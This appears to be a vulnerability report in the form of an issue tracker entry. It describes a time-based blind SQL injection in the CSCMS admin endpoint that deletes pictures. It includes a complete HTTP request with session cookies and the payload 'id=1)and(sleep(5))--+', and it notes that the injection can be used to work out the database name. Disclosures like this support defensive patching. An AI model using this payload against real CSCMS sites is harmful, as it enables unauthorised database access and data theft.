Open
Description
Details
There is a Injection vulnerability exists in pic_Pic.php_del
First create an image and then delete it. When deleting an image, SQL injection is generated. The injection point is ID
POST /admin.php/pic/admin/pic/del?yid=3 HTTP/1.1
Host: cscms.test
Content-Length: 21
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/pic/admin/pic?yid=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_session=193ad5fapoc2b6jr5pdtcpl7gp5fmjlp; cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA
Connection: close
id=1)and(sleep(5))--+
The injection point is ID and sleeps for 5 seconds
Then construct payload to blast database
Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit
Metadata
Assignees
Labels
No labels


